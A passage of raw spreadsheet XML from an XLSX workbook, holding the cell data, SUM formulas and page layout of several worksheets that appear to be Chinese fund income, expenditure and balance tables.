    <row r="48" spans="1:9" ht="12.75">
      <c r="A48" s="67"/>
      <c r="B48" s="67"/>
      <c r="C48" s="68"/>
      <c r="D48" s="68"/>
      <c r="E48" s="68"/>
      <c r="F48" s="68"/>
      <c r="G48" s="68"/>
      <c r="H48" s="68"/>
      <c r="I48" s="68"/>
    </row>
    <row r="49" spans="1:9" ht="12.75">
      <c r="A49" s="67"/>
      <c r="B49" s="67"/>
      <c r="C49" s="68"/>
      <c r="D49" s="68"/>
      <c r="E49" s="68"/>
      <c r="F49" s="68"/>
      <c r="G49" s="68"/>
      <c r="H49" s="68"/>
      <c r="I49" s="68"/>
    </row>
    <row r="50" spans="1:9" ht="12.75">
      <c r="A50" s="67"/>
      <c r="B50" s="67"/>
      <c r="C50" s="68"/>
      <c r="D50" s="68"/>
      <c r="E50" s="68"/>
      <c r="F50" s="68"/>
      <c r="G50" s="68"/>
      <c r="H50" s="68"/>
      <c r="I50" s="68"/>
    </row>
    <row r="51" spans="1:9" ht="12.75">
      <c r="A51" s="67"/>
      <c r="B51" s="67"/>
      <c r="C51" s="68"/>
      <c r="D51" s="68"/>
      <c r="E51" s="68"/>
      <c r="F51" s="68"/>
      <c r="G51" s="68"/>
      <c r="H51" s="68"/>
      <c r="I51" s="68"/>
    </row>
  </sheetData>
  <sheetProtection/>
  <mergeCells count="2">
    <mergeCell ref="A2:I2"/>
    <mergeCell ref="H3:I3"/>
  </mergeCells>
  <printOptions horizontalCentered="1"/>
  <pageMargins left="0.75" right="0.75" top="0.94" bottom="0.87" header="0.47" footer="0.47"/>
  <pageSetup firstPageNumber="52" useFirstPageNumber="1" horizontalDpi="600" verticalDpi="600" orientation="landscape" paperSize="9" scale="95"/>
  <headerFooter scaleWithDoc="0" alignWithMargins="0">
    <oddFooter>&amp;C第 &amp;P 页</oddFooter>
  </headerFooter>
</worksheet>
</file>

<file path=xl/worksheets/sheet24.xml><?xml version="1.0" encoding="utf-8"?>
<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
  <dimension ref="A1:I19"/>
  <sheetViews>
    <sheetView workbookViewId="0" topLeftCell="A1">
      <selection activeCell="B5" sqref="B5"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9.00390625" defaultRowHeight="14.25"/>
  <cols>
    <col min="1" max="1" width="36.125" style="27" customWidth="1"/>
    <col min="2" max="2" width="12.50390625" style="27" customWidth="1"/>
    <col min="3" max="3" width="14.125" style="27" customWidth="1"/>
    <col min="4" max="4" width="11.875" style="27" customWidth="1"/>
    <col min="5" max="5" width="10.625" style="28" customWidth="1"/>
    <col min="6" max="6" width="14.125" style="28" customWidth="1"/>
    <col min="7" max="7" width="11.625" style="28" customWidth="1"/>
    <col min="8" max="8" width="11.625" style="26" customWidth="1"/>
    <col min="9" max="16384" width="9.00390625" style="27" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:8" ht="36.75" customHeight="1">
      <c r="A1" s="32" t="s">
        <v>1682</v>
      </c>
      <c r="B1" s="32"/>
      <c r="C1" s="32"/>
      <c r="D1" s="32"/>
      <c r="E1" s="32"/>
      <c r="F1" s="32"/>
      <c r="G1" s="32"/>
      <c r="H1" s="32"/>
    </row>
    <row r="2" spans="1:9" ht="28.5" customHeight="1">
      <c r="A2" s="33" t="s">
        <v>1683</v>
      </c>
      <c r="B2" s="34"/>
      <c r="C2" s="34"/>
      <c r="D2" s="34"/>
      <c r="E2" s="34"/>
      <c r="F2" s="34"/>
      <c r="G2" s="61" t="s">
        <v>1639</v>
      </c>
      <c r="H2" s="62"/>
      <c r="I2" s="29"/>
    </row>
    <row r="3" spans="1:8" ht="60.75" customHeight="1">
      <c r="A3" s="54" t="s">
        <v>1658</v>
      </c>
      <c r="B3" s="54" t="s">
        <v>1659</v>
      </c>
      <c r="C3" s="54" t="s">
        <v>1660</v>
      </c>
      <c r="D3" s="54" t="s">
        <v>1662</v>
      </c>
      <c r="E3" s="54" t="s">
        <v>1663</v>
      </c>
      <c r="F3" s="54" t="s">
        <v>1664</v>
      </c>
      <c r="G3" s="54" t="s">
        <v>1665</v>
      </c>
      <c r="H3" s="63" t="s">
        <v>1666</v>
      </c>
    </row>
    <row r="4" spans="1:8" ht="22.5" customHeight="1">
      <c r="A4" s="60" t="s">
        <v>1667</v>
      </c>
      <c r="B4" s="41">
        <f aca="true" t="shared" si="0" ref="B4:B16">SUM(C4:H4)</f>
        <v>491892</v>
      </c>
      <c r="C4" s="41">
        <v>90066</v>
      </c>
      <c r="D4" s="41">
        <v>14549</v>
      </c>
      <c r="E4" s="41">
        <v>163853</v>
      </c>
      <c r="F4" s="41">
        <v>162764</v>
      </c>
      <c r="G4" s="41">
        <v>23276</v>
      </c>
      <c r="H4" s="41">
        <v>37384</v>
      </c>
    </row>
    <row r="5" spans="1:8" ht="22.5" customHeight="1">
      <c r="A5" s="59" t="s">
        <v>1668</v>
      </c>
      <c r="B5" s="41">
        <f t="shared" si="0"/>
        <v>642862</v>
      </c>
      <c r="C5" s="41">
        <f aca="true" t="shared" si="1" ref="C5:H5">SUM(C6:C11)</f>
        <v>86823</v>
      </c>
      <c r="D5" s="41">
        <f t="shared" si="1"/>
        <v>39545</v>
      </c>
      <c r="E5" s="41">
        <f t="shared" si="1"/>
        <v>158898</v>
      </c>
      <c r="F5" s="41">
        <f t="shared" si="1"/>
        <v>320883</v>
      </c>
      <c r="G5" s="41">
        <f t="shared" si="1"/>
        <v>23592</v>
      </c>
      <c r="H5" s="41">
        <f t="shared" si="1"/>
        <v>13121</v>
      </c>
    </row>
    <row r="6" spans="1:8" ht="22.5" customHeight="1">
      <c r="A6" s="59" t="s">
        <v>1684</v>
      </c>
      <c r="B6" s="41">
        <f t="shared" si="0"/>
        <v>404391</v>
      </c>
      <c r="C6" s="41">
        <v>78050</v>
      </c>
      <c r="D6" s="41">
        <v>30857</v>
      </c>
      <c r="E6" s="41">
        <v>157300</v>
      </c>
      <c r="F6" s="41">
        <v>102864</v>
      </c>
      <c r="G6" s="41">
        <v>23254</v>
      </c>
      <c r="H6" s="41">
        <v>12066</v>
      </c>
    </row>
    <row r="7" spans="1:8" ht="22.5" customHeight="1">
      <c r="A7" s="59" t="s">
        <v>1685</v>
      </c>
      <c r="B7" s="41">
        <f t="shared" si="0"/>
        <v>4686</v>
      </c>
      <c r="C7" s="41">
        <v>1196</v>
      </c>
      <c r="D7" s="41">
        <v>108</v>
      </c>
      <c r="E7" s="41">
        <v>1362</v>
      </c>
      <c r="F7" s="41">
        <v>957</v>
      </c>
      <c r="G7" s="41">
        <v>328</v>
      </c>
      <c r="H7" s="57">
        <v>735</v>
      </c>
    </row>
    <row r="8" spans="1:8" ht="22.5" customHeight="1">
      <c r="A8" s="59" t="s">
        <v>1686</v>
      </c>
      <c r="B8" s="41">
        <f t="shared" si="0"/>
        <v>226666</v>
      </c>
      <c r="C8" s="41">
        <v>1064</v>
      </c>
      <c r="D8" s="41">
        <v>8545</v>
      </c>
      <c r="E8" s="41"/>
      <c r="F8" s="41">
        <v>217057</v>
      </c>
      <c r="G8" s="41"/>
      <c r="H8" s="57"/>
    </row>
    <row r="9" spans="1:8" ht="22.5" customHeight="1">
      <c r="A9" s="59" t="s">
        <v>1687</v>
      </c>
      <c r="B9" s="41">
        <f t="shared" si="0"/>
        <v>1696</v>
      </c>
      <c r="C9" s="41">
        <v>1598</v>
      </c>
      <c r="D9" s="41"/>
      <c r="E9" s="41">
        <v>82</v>
      </c>
      <c r="F9" s="41">
        <v>5</v>
      </c>
      <c r="G9" s="41">
        <v>10</v>
      </c>
      <c r="H9" s="57">
        <v>1</v>
      </c>
    </row>
    <row r="10" spans="1:8" ht="22.5" customHeight="1">
      <c r="A10" s="59" t="s">
        <v>1688</v>
      </c>
      <c r="B10" s="41">
        <f t="shared" si="0"/>
        <v>1173</v>
      </c>
      <c r="C10" s="41">
        <v>665</v>
      </c>
      <c r="D10" s="41">
        <v>35</v>
      </c>
      <c r="E10" s="41">
        <v>154</v>
      </c>
      <c r="F10" s="41"/>
      <c r="G10" s="41"/>
      <c r="H10" s="57">
        <v>319</v>
      </c>
    </row>
    <row r="11" spans="1:8" ht="22.5" customHeight="1">
      <c r="A11" s="60" t="s">
        <v>1689</v>
      </c>
      <c r="B11" s="41">
        <f t="shared" si="0"/>
        <v>4250</v>
      </c>
      <c r="C11" s="41">
        <v>4250</v>
      </c>
      <c r="D11" s="41"/>
      <c r="E11" s="41"/>
      <c r="F11" s="41"/>
      <c r="G11" s="41"/>
      <c r="H11" s="57"/>
    </row>
    <row r="12" spans="1:8" ht="22.5" customHeight="1">
      <c r="A12" s="59" t="s">
        <v>1675</v>
      </c>
      <c r="B12" s="41">
        <f t="shared" si="0"/>
        <v>676820</v>
      </c>
      <c r="C12" s="41">
        <f aca="true" t="shared" si="2" ref="C12:I12">SUM(C13:C16)</f>
        <v>86582</v>
      </c>
      <c r="D12" s="41">
        <f t="shared" si="2"/>
        <v>44710</v>
      </c>
      <c r="E12" s="41">
        <f t="shared" si="2"/>
        <v>146476</v>
      </c>
      <c r="F12" s="41">
        <f t="shared" si="2"/>
        <v>362102</v>
      </c>
      <c r="G12" s="41">
        <f t="shared" si="2"/>
        <v>26242</v>
      </c>
      <c r="H12" s="41">
        <f t="shared" si="2"/>
        <v>10708</v>
      </c>
    </row>
    <row r="13" spans="1:8" ht="22.5" customHeight="1">
      <c r="A13" s="59" t="s">
        <v>1690</v>
      </c>
      <c r="B13" s="41">
        <f t="shared" si="0"/>
        <v>627082</v>
      </c>
      <c r="C13" s="41">
        <v>86170</v>
      </c>
      <c r="D13" s="41">
        <v>44710</v>
      </c>
      <c r="E13" s="41">
        <v>146108</v>
      </c>
      <c r="F13" s="41">
        <v>320021</v>
      </c>
      <c r="G13" s="41">
        <v>25782</v>
      </c>
      <c r="H13" s="41">
        <v>4291</v>
      </c>
    </row>
    <row r="14" spans="1:8" ht="22.5" customHeight="1">
      <c r="A14" s="59" t="s">
        <v>1691</v>
      </c>
      <c r="B14" s="41">
        <f t="shared" si="0"/>
        <v>47280</v>
      </c>
      <c r="C14" s="41"/>
      <c r="D14" s="41"/>
      <c r="E14" s="41"/>
      <c r="F14" s="41">
        <v>42081</v>
      </c>
      <c r="G14" s="41">
        <v>9</v>
      </c>
      <c r="H14" s="41">
        <v>5190</v>
      </c>
    </row>
    <row r="15" spans="1:8" ht="22.5" customHeight="1">
      <c r="A15" s="59" t="s">
        <v>1692</v>
      </c>
      <c r="B15" s="41">
        <f t="shared" si="0"/>
        <v>780</v>
      </c>
      <c r="C15" s="41">
        <v>412</v>
      </c>
      <c r="D15" s="41"/>
      <c r="E15" s="41">
        <v>368</v>
      </c>
      <c r="F15" s="41"/>
      <c r="G15" s="41"/>
      <c r="H15" s="41"/>
    </row>
    <row r="16" spans="1:8" ht="22.5" customHeight="1">
      <c r="A16" s="59" t="s">
        <v>1693</v>
      </c>
      <c r="B16" s="41">
        <f t="shared" si="0"/>
        <v>1678</v>
      </c>
      <c r="C16" s="41"/>
      <c r="D16" s="41"/>
      <c r="E16" s="41"/>
      <c r="F16" s="41"/>
      <c r="G16" s="41">
        <v>451</v>
      </c>
      <c r="H16" s="41">
        <v>1227</v>
      </c>
    </row>
    <row r="17" spans="1:8" ht="22.5" customHeight="1">
      <c r="A17" s="59" t="s">
        <v>1680</v>
      </c>
      <c r="B17" s="41">
        <f aca="true" t="shared" si="3" ref="B17:H17">B5-B12</f>
        <v>-33958</v>
      </c>
      <c r="C17" s="41">
        <f t="shared" si="3"/>
        <v>241</v>
      </c>
      <c r="D17" s="41">
        <f t="shared" si="3"/>
        <v>-5165</v>
      </c>
      <c r="E17" s="41">
        <f t="shared" si="3"/>
        <v>12422</v>
      </c>
      <c r="F17" s="41">
        <f t="shared" si="3"/>
        <v>-41219</v>
      </c>
      <c r="G17" s="41">
        <f t="shared" si="3"/>
        <v>-2650</v>
      </c>
      <c r="H17" s="41">
        <f t="shared" si="3"/>
        <v>2413</v>
      </c>
    </row>
    <row r="18" spans="1:8" ht="22.5" customHeight="1">
      <c r="A18" s="59" t="s">
        <v>1681</v>
      </c>
      <c r="B18" s="41">
        <f aca="true" t="shared" si="4" ref="B18:H18">B4+B5-B12</f>
        <v>457934</v>
      </c>
      <c r="C18" s="41">
        <f t="shared" si="4"/>
        <v>90307</v>
      </c>
      <c r="D18" s="41">
        <f t="shared" si="4"/>
        <v>9384</v>
      </c>
      <c r="E18" s="41">
        <f t="shared" si="4"/>
        <v>176275</v>
      </c>
      <c r="F18" s="41">
        <f t="shared" si="4"/>
        <v>121545</v>
      </c>
      <c r="G18" s="41">
        <f t="shared" si="4"/>
        <v>20626</v>
      </c>
      <c r="H18" s="41">
        <f t="shared" si="4"/>
        <v>39797</v>
      </c>
    </row>
    <row r="19" spans="5:8" ht="12.75">
      <c r="E19" s="27"/>
      <c r="F19" s="27"/>
      <c r="G19" s="27"/>
      <c r="H19" s="27"/>
    </row>
  </sheetData>
  <sheetProtection/>
  <mergeCells count="2">
    <mergeCell ref="A1:H1"/>
    <mergeCell ref="G2:H2"/>
  </mergeCells>
  <printOptions horizontalCentered="1"/>
  <pageMargins left="0.75" right="0.75" top="0.94" bottom="0.87" header="0.47" footer="0.47"/>
  <pageSetup firstPageNumber="53" useFirstPageNumber="1" horizontalDpi="600" verticalDpi="600" orientation="landscape" paperSize="9" scale="95"/>
  <headerFooter scaleWithDoc="0" alignWithMargins="0">
    <oddFooter>&amp;C第 &amp;P 页</oddFooter>
  </headerFooter>
</worksheet>
</file>

<file path=xl/worksheets/sheet25.xml><?xml version="1.0" encoding="utf-8"?>
<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
  <dimension ref="A1:E18"/>
  <sheetViews>
    <sheetView workbookViewId="0" topLeftCell="A1">
      <selection activeCell="A1" sqref="A1:D1"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9.00390625" defaultRowHeight="14.25"/>
  <cols>
    <col min="1" max="1" width="40.625" style="27" customWidth="1"/>
    <col min="2" max="3" width="26.375" style="28" customWidth="1"/>
    <col min="4" max="4" width="27.875" style="27" customWidth="1"/>
    <col min="5" max="5" width="9.00390625" style="27" hidden="1" customWidth="1"/>
    <col min="6" max="6" width="27.00390625" style="27" customWidth="1"/>
    <col min="7" max="7" width="25.875" style="27" customWidth="1"/>
    <col min="8" max="16384" width="9.00390625" style="27" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:4" s="52" customFormat="1" ht="37.5" customHeight="1">
      <c r="A1" s="32" t="s">
        <v>1694</v>
      </c>
      <c r="B1" s="32"/>
      <c r="C1" s="32"/>
      <c r="D1" s="32"/>
    </row>
    <row r="2" spans="1:4" ht="27" customHeight="1">
      <c r="A2" s="33" t="s">
        <v>1695</v>
      </c>
      <c r="B2" s="34"/>
      <c r="D2" s="53" t="s">
        <v>1639</v>
      </c>
    </row>
    <row r="3" spans="1:4" ht="37.5" customHeight="1">
      <c r="A3" s="54" t="s">
        <v>1658</v>
      </c>
      <c r="B3" s="54" t="s">
        <v>1696</v>
      </c>
      <c r="C3" s="54" t="s">
        <v>1697</v>
      </c>
      <c r="D3" s="55" t="s">
        <v>1643</v>
      </c>
    </row>
    <row r="4" spans="1:4" ht="24" customHeight="1">
      <c r="A4" s="56" t="s">
        <v>1668</v>
      </c>
      <c r="B4" s="57">
        <v>1053226</v>
      </c>
      <c r="C4" s="57">
        <v>578148</v>
      </c>
      <c r="D4" s="58"/>
    </row>
    <row r="5" spans="1:4" ht="24" customHeight="1">
      <c r="A5" s="59" t="s">
        <v>1684</v>
      </c>
      <c r="B5" s="41">
        <v>535801</v>
      </c>
      <c r="C5" s="57">
        <v>331146</v>
      </c>
      <c r="D5" s="58"/>
    </row>
    <row r="6" spans="1:4" ht="24" customHeight="1">
      <c r="A6" s="59" t="s">
        <v>1685</v>
      </c>
      <c r="B6" s="57">
        <v>12363</v>
      </c>
      <c r="C6" s="57">
        <v>5034</v>
      </c>
      <c r="D6" s="58"/>
    </row>
    <row r="7" spans="1:4" ht="24" customHeight="1">
      <c r="A7" s="59" t="s">
        <v>1686</v>
      </c>
      <c r="B7" s="57">
        <v>503571</v>
      </c>
      <c r="C7" s="57">
        <v>241256</v>
      </c>
      <c r="D7" s="58"/>
    </row>
    <row r="8" spans="1:4" ht="24" customHeight="1">
      <c r="A8" s="59" t="s">
        <v>1687</v>
      </c>
      <c r="B8" s="57">
        <v>823</v>
      </c>
      <c r="C8" s="57">
        <v>183</v>
      </c>
      <c r="D8" s="58"/>
    </row>
    <row r="9" spans="1:4" ht="24" customHeight="1">
      <c r="A9" s="59" t="s">
        <v>1688</v>
      </c>
      <c r="B9" s="57">
        <v>668</v>
      </c>
      <c r="C9" s="57">
        <v>529</v>
      </c>
      <c r="D9" s="58"/>
    </row>
    <row r="10" spans="1:4" ht="24" customHeight="1">
      <c r="A10" s="56" t="s">
        <v>1675</v>
      </c>
      <c r="B10" s="57">
        <v>990927</v>
      </c>
      <c r="C10" s="57">
        <v>564586</v>
      </c>
      <c r="D10" s="58"/>
    </row>
    <row r="11" spans="1:4" ht="24" customHeight="1">
      <c r="A11" s="59" t="s">
        <v>1690</v>
      </c>
      <c r="B11" s="57">
        <v>942605</v>
      </c>
      <c r="C11" s="57">
        <v>516417</v>
      </c>
      <c r="D11" s="58"/>
    </row>
    <row r="12" spans="1:4" ht="24" customHeight="1">
      <c r="A12" s="59" t="s">
        <v>1691</v>
      </c>
      <c r="B12" s="57">
        <v>46197</v>
      </c>
      <c r="C12" s="57">
        <v>46197</v>
      </c>
      <c r="D12" s="58"/>
    </row>
    <row r="13" spans="1:4" ht="24" customHeight="1">
      <c r="A13" s="59" t="s">
        <v>1692</v>
      </c>
      <c r="B13" s="57">
        <v>627</v>
      </c>
      <c r="C13" s="57">
        <v>474</v>
      </c>
      <c r="D13" s="58"/>
    </row>
    <row r="14" spans="1:5" ht="24" customHeight="1">
      <c r="A14" s="59" t="s">
        <v>1693</v>
      </c>
      <c r="B14" s="57">
        <v>1498</v>
      </c>
      <c r="C14" s="57">
        <v>1498</v>
      </c>
      <c r="D14" s="60"/>
      <c r="E14" s="60"/>
    </row>
    <row r="15" spans="1:4" ht="24" customHeight="1">
      <c r="A15" s="56" t="s">
        <v>1680</v>
      </c>
      <c r="B15" s="41">
        <v>62299</v>
      </c>
      <c r="C15" s="41">
        <v>13562</v>
      </c>
      <c r="D15" s="58"/>
    </row>
    <row r="18" spans="2:3" ht="12.75">
      <c r="B18" s="51"/>
      <c r="C18" s="51"/>
    </row>
  </sheetData>
  <sheetProtection/>
  <mergeCells count="1">
    <mergeCell ref="A1:D1"/>
  </mergeCells>
  <printOptions horizontalCentered="1"/>
  <pageMargins left="0.75" right="0.75" top="0.94" bottom="0.87" header="0.47" footer="0.47"/>
  <pageSetup firstPageNumber="54" useFirstPageNumber="1" horizontalDpi="600" verticalDpi="600" orientation="landscape" paperSize="9" scale="95"/>
  <headerFooter scaleWithDoc="0" alignWithMargins="0">
    <oddFooter>&amp;C第 &amp;P 页</oddFooter>
  </headerFooter>
</worksheet>
</file>

<file path=xl/worksheets/sheet26.xml><?xml version="1.0" encoding="utf-8"?>
<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
  <dimension ref="A1:H18"/>
  <sheetViews>
    <sheetView showZeros="0" workbookViewId="0" topLeftCell="A1">
      <selection activeCell="J14" sqref="J14"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9.00390625" defaultRowHeight="14.25"/>
  <cols>
    <col min="1" max="1" width="26.625" style="28" customWidth="1"/>
    <col min="2" max="2" width="12.875" style="28" customWidth="1"/>
    <col min="3" max="3" width="14.625" style="28" customWidth="1"/>
    <col min="4" max="4" width="15.125" style="28" customWidth="1"/>
    <col min="5" max="6" width="14.625" style="28" customWidth="1"/>
    <col min="7" max="8" width="12.625" style="28" customWidth="1"/>
    <col min="9" max="16384" width="9.00390625" style="28" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:8" ht="15" customHeight="1">
      <c r="A1" s="29"/>
      <c r="B1" s="30"/>
      <c r="C1" s="30"/>
      <c r="D1" s="30"/>
      <c r="E1" s="30"/>
      <c r="F1" s="30"/>
      <c r="G1" s="30"/>
      <c r="H1" s="30"/>
    </row>
    <row r="2" spans="1:8" ht="24" customHeight="1">
      <c r="A2" s="32" t="s">
        <v>1698</v>
      </c>
      <c r="B2" s="32"/>
      <c r="C2" s="32"/>
      <c r="D2" s="45"/>
      <c r="E2" s="45"/>
      <c r="F2" s="45"/>
      <c r="G2" s="32"/>
      <c r="H2" s="32"/>
    </row>
    <row r="3" spans="1:8" ht="27" customHeight="1">
      <c r="A3" s="46" t="s">
        <v>1699</v>
      </c>
      <c r="B3" s="34"/>
      <c r="C3" s="34"/>
      <c r="D3" s="30"/>
      <c r="E3" s="34"/>
      <c r="F3" s="34"/>
      <c r="G3" s="34"/>
      <c r="H3" s="36" t="s">
        <v>1639</v>
      </c>
    </row>
    <row r="4" spans="1:8" ht="21" customHeight="1" hidden="1">
      <c r="A4" s="47" t="s">
        <v>1700</v>
      </c>
      <c r="B4" s="34"/>
      <c r="C4" s="34"/>
      <c r="D4" s="30"/>
      <c r="E4" s="34"/>
      <c r="F4" s="34"/>
      <c r="G4" s="34"/>
      <c r="H4" s="36" t="s">
        <v>1639</v>
      </c>
    </row>
    <row r="5" spans="1:8" ht="48" customHeight="1">
      <c r="A5" s="38" t="s">
        <v>1658</v>
      </c>
      <c r="B5" s="38" t="s">
        <v>1659</v>
      </c>
      <c r="C5" s="38" t="s">
        <v>1701</v>
      </c>
      <c r="D5" s="38" t="s">
        <v>1662</v>
      </c>
      <c r="E5" s="38" t="s">
        <v>1663</v>
      </c>
      <c r="F5" s="38" t="s">
        <v>1664</v>
      </c>
      <c r="G5" s="38" t="s">
        <v>1665</v>
      </c>
      <c r="H5" s="38" t="s">
        <v>1666</v>
      </c>
    </row>
    <row r="6" spans="1:8" ht="28.5" customHeight="1">
      <c r="A6" s="48" t="s">
        <v>1668</v>
      </c>
      <c r="B6" s="41">
        <f aca="true" t="shared" si="0" ref="B6:B17">SUM(C6:H6)</f>
        <v>1053226</v>
      </c>
      <c r="C6" s="41">
        <f aca="true" t="shared" si="1" ref="C6:H6">SUM(C7:C11)</f>
        <v>155206</v>
      </c>
      <c r="D6" s="41">
        <f t="shared" si="1"/>
        <v>361240</v>
      </c>
      <c r="E6" s="41">
        <f t="shared" si="1"/>
        <v>170225</v>
      </c>
      <c r="F6" s="41">
        <f t="shared" si="1"/>
        <v>331355</v>
      </c>
      <c r="G6" s="41">
        <f t="shared" si="1"/>
        <v>23106</v>
      </c>
      <c r="H6" s="41">
        <f t="shared" si="1"/>
        <v>12094</v>
      </c>
    </row>
    <row r="7" spans="1:8" ht="28.5" customHeight="1">
      <c r="A7" s="48" t="s">
        <v>1702</v>
      </c>
      <c r="B7" s="41">
        <f t="shared" si="0"/>
        <v>535801</v>
      </c>
      <c r="C7" s="41">
        <v>41921</v>
      </c>
      <c r="D7" s="41">
        <v>189237</v>
      </c>
      <c r="E7" s="41">
        <v>167735</v>
      </c>
      <c r="F7" s="41">
        <v>103050</v>
      </c>
      <c r="G7" s="41">
        <v>22764</v>
      </c>
      <c r="H7" s="41">
        <v>11094</v>
      </c>
    </row>
    <row r="8" spans="1:8" ht="28.5" customHeight="1">
      <c r="A8" s="48" t="s">
        <v>1670</v>
      </c>
      <c r="B8" s="41">
        <f t="shared" si="0"/>
        <v>12363</v>
      </c>
      <c r="C8" s="41">
        <v>6832</v>
      </c>
      <c r="D8" s="41">
        <v>697</v>
      </c>
      <c r="E8" s="41">
        <v>2280</v>
      </c>
      <c r="F8" s="41">
        <v>1524</v>
      </c>
      <c r="G8" s="41">
        <v>330</v>
      </c>
      <c r="H8" s="41">
        <v>700</v>
      </c>
    </row>
    <row r="9" spans="1:8" ht="28.5" customHeight="1">
      <c r="A9" s="48" t="s">
        <v>1671</v>
      </c>
      <c r="B9" s="41">
        <f t="shared" si="0"/>
        <v>503571</v>
      </c>
      <c r="C9" s="41">
        <v>105704</v>
      </c>
      <c r="D9" s="41">
        <v>171156</v>
      </c>
      <c r="E9" s="41"/>
      <c r="F9" s="41">
        <v>226711</v>
      </c>
      <c r="G9" s="41"/>
      <c r="H9" s="41"/>
    </row>
    <row r="10" spans="1:8" ht="28.5" customHeight="1">
      <c r="A10" s="48" t="s">
        <v>1672</v>
      </c>
      <c r="B10" s="41">
        <f t="shared" si="0"/>
        <v>823</v>
      </c>
      <c r="C10" s="41">
        <v>640</v>
      </c>
      <c r="D10" s="41"/>
      <c r="E10" s="41">
        <v>101</v>
      </c>
      <c r="F10" s="41">
        <v>70</v>
      </c>
      <c r="G10" s="41">
        <v>12</v>
      </c>
      <c r="H10" s="41"/>
    </row>
    <row r="11" spans="1:8" ht="28.5" customHeight="1">
      <c r="A11" s="48" t="s">
        <v>1673</v>
      </c>
      <c r="B11" s="41">
        <f t="shared" si="0"/>
        <v>668</v>
      </c>
      <c r="C11" s="41">
        <v>109</v>
      </c>
      <c r="D11" s="41">
        <v>150</v>
      </c>
      <c r="E11" s="41">
        <v>109</v>
      </c>
      <c r="F11" s="41"/>
      <c r="G11" s="41"/>
      <c r="H11" s="41">
        <v>300</v>
      </c>
    </row>
    <row r="12" spans="1:8" ht="28.5" customHeight="1">
      <c r="A12" s="48" t="s">
        <v>1675</v>
      </c>
      <c r="B12" s="41">
        <f t="shared" si="0"/>
        <v>990927</v>
      </c>
      <c r="C12" s="41">
        <f aca="true" t="shared" si="2" ref="C12:H12">SUM(C13:C16)</f>
        <v>106693</v>
      </c>
      <c r="D12" s="41">
        <f t="shared" si="2"/>
        <v>366468</v>
      </c>
      <c r="E12" s="41">
        <f t="shared" si="2"/>
        <v>149486</v>
      </c>
      <c r="F12" s="41">
        <f t="shared" si="2"/>
        <v>330725</v>
      </c>
      <c r="G12" s="41">
        <f t="shared" si="2"/>
        <v>26368</v>
      </c>
      <c r="H12" s="41">
        <f t="shared" si="2"/>
        <v>11187</v>
      </c>
    </row>
    <row r="13" spans="1:8" ht="28.5" customHeight="1">
      <c r="A13" s="48" t="s">
        <v>1703</v>
      </c>
      <c r="B13" s="41">
        <f t="shared" si="0"/>
        <v>942605</v>
      </c>
      <c r="C13" s="41">
        <v>106570</v>
      </c>
      <c r="D13" s="41">
        <v>366338</v>
      </c>
      <c r="E13" s="41">
        <v>149112</v>
      </c>
      <c r="F13" s="41">
        <v>288627</v>
      </c>
      <c r="G13" s="41">
        <v>25594</v>
      </c>
      <c r="H13" s="41">
        <v>6364</v>
      </c>
    </row>
    <row r="14" spans="1:8" ht="28.5" customHeight="1">
      <c r="A14" s="48" t="s">
        <v>1677</v>
      </c>
      <c r="B14" s="41">
        <f t="shared" si="0"/>
        <v>46197</v>
      </c>
      <c r="C14" s="41"/>
      <c r="D14" s="49"/>
      <c r="E14" s="41"/>
      <c r="F14" s="41">
        <v>42098</v>
      </c>
      <c r="G14" s="41">
        <v>334</v>
      </c>
      <c r="H14" s="41">
        <v>3765</v>
      </c>
    </row>
    <row r="15" spans="1:8" ht="28.5" customHeight="1">
      <c r="A15" s="48" t="s">
        <v>1678</v>
      </c>
      <c r="B15" s="41">
        <f t="shared" si="0"/>
        <v>627</v>
      </c>
      <c r="C15" s="41">
        <v>123</v>
      </c>
      <c r="D15" s="41">
        <v>130</v>
      </c>
      <c r="E15" s="41">
        <v>374</v>
      </c>
      <c r="F15" s="41"/>
      <c r="G15" s="41"/>
      <c r="H15" s="41"/>
    </row>
    <row r="16" spans="1:8" ht="28.5" customHeight="1">
      <c r="A16" s="50" t="s">
        <v>1679</v>
      </c>
      <c r="B16" s="41">
        <f t="shared" si="0"/>
        <v>1498</v>
      </c>
      <c r="C16" s="41"/>
      <c r="D16" s="41"/>
      <c r="E16" s="41"/>
      <c r="F16" s="41"/>
      <c r="G16" s="41">
        <v>440</v>
      </c>
      <c r="H16" s="41">
        <v>1058</v>
      </c>
    </row>
    <row r="17" spans="1:8" ht="28.5" customHeight="1">
      <c r="A17" s="48" t="s">
        <v>1680</v>
      </c>
      <c r="B17" s="41">
        <f t="shared" si="0"/>
        <v>62299</v>
      </c>
      <c r="C17" s="41">
        <f aca="true" t="shared" si="3" ref="C17:H17">C6-C12</f>
        <v>48513</v>
      </c>
      <c r="D17" s="41">
        <f t="shared" si="3"/>
        <v>-5228</v>
      </c>
      <c r="E17" s="41">
        <f t="shared" si="3"/>
        <v>20739</v>
      </c>
      <c r="F17" s="41">
        <f t="shared" si="3"/>
        <v>630</v>
      </c>
      <c r="G17" s="41">
        <f t="shared" si="3"/>
        <v>-3262</v>
      </c>
      <c r="H17" s="41">
        <f t="shared" si="3"/>
        <v>907</v>
      </c>
    </row>
    <row r="18" spans="2:8" ht="14.25" customHeight="1">
      <c r="B18" s="51"/>
      <c r="C18" s="51"/>
      <c r="D18" s="51"/>
      <c r="E18" s="51"/>
      <c r="F18" s="51"/>
      <c r="G18" s="51"/>
      <c r="H18" s="51"/>
    </row>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sheetData>
  <sheetProtection/>
  <mergeCells count="1">
    <mergeCell ref="A2:H2"/>
  </mergeCells>
  <printOptions horizontalCentered="1"/>
  <pageMargins left="0.75" right="0.75" top="0.94" bottom="0.87" header="0.47" footer="0.47"/>
  <pageSetup firstPageNumber="55" useFirstPageNumber="1" horizontalDpi="600" verticalDpi="600" orientation="landscape" paperSize="9" scale="95"/>
